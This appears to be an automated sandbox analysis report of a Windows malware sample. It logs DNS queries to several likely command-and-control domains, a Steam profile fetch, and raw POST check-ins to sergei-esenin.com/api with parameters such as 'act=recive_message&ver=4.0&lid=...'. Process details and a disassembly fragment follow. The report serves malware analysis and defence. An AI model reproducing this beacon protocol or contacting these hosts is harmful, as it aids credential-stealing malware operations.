                                                                      Oct 14, 2024 03:57:11.722239017 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.722264051 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.722476006 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.722670078 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.725781918 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.725781918 CEST49731443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:11.725852013 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:11.725887060 CEST44349731172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.050019026 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.050112963 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.050218105 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.050916910 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.051000118 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.549774885 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.549983978 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.551697969 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.551726103 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.552642107 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.554214001 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.554258108 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.554477930 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.971836090 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.972109079 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.972316980 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.972623110 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.972623110 CEST49732443192.168.2.4172.67.206.204
                                                                      Oct 14, 2024 03:57:12.972657919 CEST44349732172.67.206.204192.168.2.4
                                                                      Oct 14, 2024 03:57:12.972676039 CEST44349732172.67.206.204192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 14, 2024 03:57:09.547857046 CEST6073653192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.556580067 CEST53607361.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.558058977 CEST5773253192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.566842079 CEST53577321.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.567873955 CEST5764153192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.578118086 CEST53576411.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.579914093 CEST5478053192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.588543892 CEST53547801.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.589679003 CEST6043553192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.598057032 CEST53604351.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.602986097 CEST6525653192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.611860037 CEST53652561.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.626697063 CEST6382653192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.636102915 CEST53638261.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.639455080 CEST5466053192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.648382902 CEST53546601.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:09.651525974 CEST5538853192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:09.658164024 CEST53553881.1.1.1192.168.2.4
                                                                      Oct 14, 2024 03:57:11.077238083 CEST5935953192.168.2.41.1.1.1
                                                                      Oct 14, 2024 03:57:11.092847109 CEST53593591.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 14, 2024 03:57:09.547857046 CEST192.168.2.41.1.1.10x1d46Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.558058977 CEST192.168.2.41.1.1.10xcb9fStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.567873955 CEST192.168.2.41.1.1.10x5743Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.579914093 CEST192.168.2.41.1.1.10x429fStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.589679003 CEST192.168.2.41.1.1.10x57feStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.602986097 CEST192.168.2.41.1.1.10xfe2eStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.626697063 CEST192.168.2.41.1.1.10xd70eStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.639455080 CEST192.168.2.41.1.1.10x8effStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.651525974 CEST192.168.2.41.1.1.10xbfb5Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:11.077238083 CEST192.168.2.41.1.1.10x62cStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 14, 2024 03:57:09.556580067 CEST1.1.1.1192.168.2.40x1d46Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.566842079 CEST1.1.1.1192.168.2.40xcb9fName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.578118086 CEST1.1.1.1192.168.2.40x5743Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.588543892 CEST1.1.1.1192.168.2.40x429fName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.598057032 CEST1.1.1.1192.168.2.40x57feName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.611860037 CEST1.1.1.1192.168.2.40xfe2eName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.636102915 CEST1.1.1.1192.168.2.40xd70eName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.648382902 CEST1.1.1.1192.168.2.40x8effName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:09.658164024 CEST1.1.1.1192.168.2.40xbfb5No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:11.092847109 CEST1.1.1.1192.168.2.40x62cNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                      Oct 14, 2024 03:57:11.092847109 CEST1.1.1.1192.168.2.40x62cNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • steamcommunity.com
                                                                      • sergei-esenin.com

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730104.102.49.2544436848C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-14 01:57:10 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Host: steamcommunity.com
                                                                      2024-10-14 01:57:10 UTC1870INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                      Cache-Control: no-cache
                                                                      Date: Mon, 14 Oct 2024 01:57:10 GMT
                                                                      Content-Length: 34837
                                                                      Connection: close
                                                                      Set-Cookie: sessionid=eca71814040f86585edd9a53; Path=/; Secure; SameSite=None
                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                      2024-10-14 01:57:10 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                      2024-10-14 01:57:11 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                      Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                      2024-10-14 01:57:11 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                      Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                      2024-10-14 01:57:11 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449731172.67.206.2044436848C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-14 01:57:11 UTC264OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: sergei-esenin.com
                                                                      2024-10-14 01:57:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-10-14 01:57:11 UTC547INHTTP/1.1 200 OK
                                                                      Date: Mon, 14 Oct 2024 01:57:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WcUUlcq5VQ7lMsCTFh4bPFJkD5YbJtVf0Fnw4vf2LcYfLXDM2wRYkqb7MnBRmUPC4Usma0hyB3bkBi8xj0MT5NBJscqMKflgyKV8yw0rpcRjidjwO0k3yryFi81dhNCdjNee6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d23f50bfa3a0f7d-EWR
                                                                      2024-10-14 01:57:11 UTC822INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                      Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                      2024-10-14 01:57:11 UTC1369INData Raw: 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61
                                                                      Data Ascii: rrors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-a
                                                                      2024-10-14 01:57:11 UTC1369INData Raw: 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70
                                                                      Data Ascii: phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input typ
                                                                      2024-10-14 01:57:11 UTC881INData Raw: 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e
                                                                      Data Ascii: pan class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_lin
                                                                      2024-10-14 01:57:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449732172.67.206.2044436848C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-14 01:57:12 UTC354OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Cookie: __cf_mw_byp=HZlidKlpcv_p0sfMpNIO76uVyDFPfvMjvRK5J6.GgLc-1728871031-0.0.1.1-/api
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 52
                                                                      Host: sergei-esenin.com
                                                                      2024-10-14 01:57:12 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                      2024-10-14 01:57:12 UTC829INHTTP/1.1 200 OK
                                                                      Date: Mon, 14 Oct 2024 01:57:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=k1iro9et1oulsfh09t1q1t8uf2; expires=Thu, 06 Feb 2025 19:43:51 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1JaHRFuQFlR2u377OS1hmRVBJmT%2FquLCwFqz0uJ9h%2BhVpcKtp%2BtQgyqNkN2ITBw9SsoKLJuuxtwl8DOHnnES3XcTIepcZ5AekHNFFXG3Hz3tpcl6%2BXaUpjaLve1be0hmaiZ9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d23f511ee400f83-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-10-14 01:57:12 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                      Data Ascii: aerror #D12
                                                                      2024-10-14 01:57:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:21:57:05
                                                                      Start date:13/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x340000
                                                                      File size:2'952'192 bytes
                                                                      MD5 hash:283F654B01A0041E91613545E4B1B7D1
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:21:57:12
                                                                      Start date:13/10/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1904
                                                                      Imagebase:0x2c0000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:21:57:12
                                                                      Start date:13/10/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1896
                                                                      Imagebase:0x2c0000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:2.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:35.8%
                                                                        Total number of Nodes:212
                                                                        Total number of Limit Nodes:15
                                                                        execution_graph 7532 34edb5 7535 34edd0 7532->7535 7536 34fca0 7535->7536 7538 34fcdc 7536->7538 7537 34ef70 7538->7537 7540 383220 7538->7540 7541 3832ac 7540->7541 7542 383236 7540->7542 7543 3832a2 RtlFreeHeap 7540->7543 7541->7537 7542->7543 7543->7541 7689 356536 7690 35655c 7689->7690 7693 3832c0 7690->7693 7692 3568a4 7692->7692 7695 3832f0 7693->7695 7694 383492 7694->7692 7697 38333e 7695->7697 7701 385bb0 LdrInitializeThunk 7695->7701 7697->7694 7699 3833fe 7697->7699 7702 385bb0 LdrInitializeThunk 7697->7702 7698 383220 RtlFreeHeap 7698->7694 7699->7698 7701->7697 7702->7699 7558 3895b0 7560 3895d0 7558->7560 7559 38970e 7560->7559 7562 385bb0 LdrInitializeThunk 7560->7562 7562->7559 7703 35d93c 7704 3898f0 LdrInitializeThunk 7703->7704 7705 35d952 7704->7705 7775 354b3c 7776 354b40 7775->7776 7777 3642b0 LdrInitializeThunk 7776->7777 7778 355a97 7776->7778 7777->7778 7764 356ebf 7768 356a52 7764->7768 7766 383220 RtlFreeHeap 7766->7768 7768->7764 7768->7766 7769 383630 7768->7769 7773 385bb0 LdrInitializeThunk 7768->7773 7770 3836be 7769->7770 7771 383640 7769->7771 7770->7768 7771->7770 7774 385bb0 LdrInitializeThunk 7771->7774 7773->7768 7774->7770 7728 35d961 7729 35d96e 7728->7729 7730 3899d0 LdrInitializeThunk 7729->7730 7731 35d983 7730->7731 7584 352fe0 7585 352ffa 7584->7585 7585->7584 7586 3534cc 7585->7586 7587 353377 7585->7587 7588 383220 RtlFreeHeap 7585->7588 7605 369510 7586->7605 7588->7585 7590 353674 7613 369bb0 7590->7613 7606 36956e 7605->7606 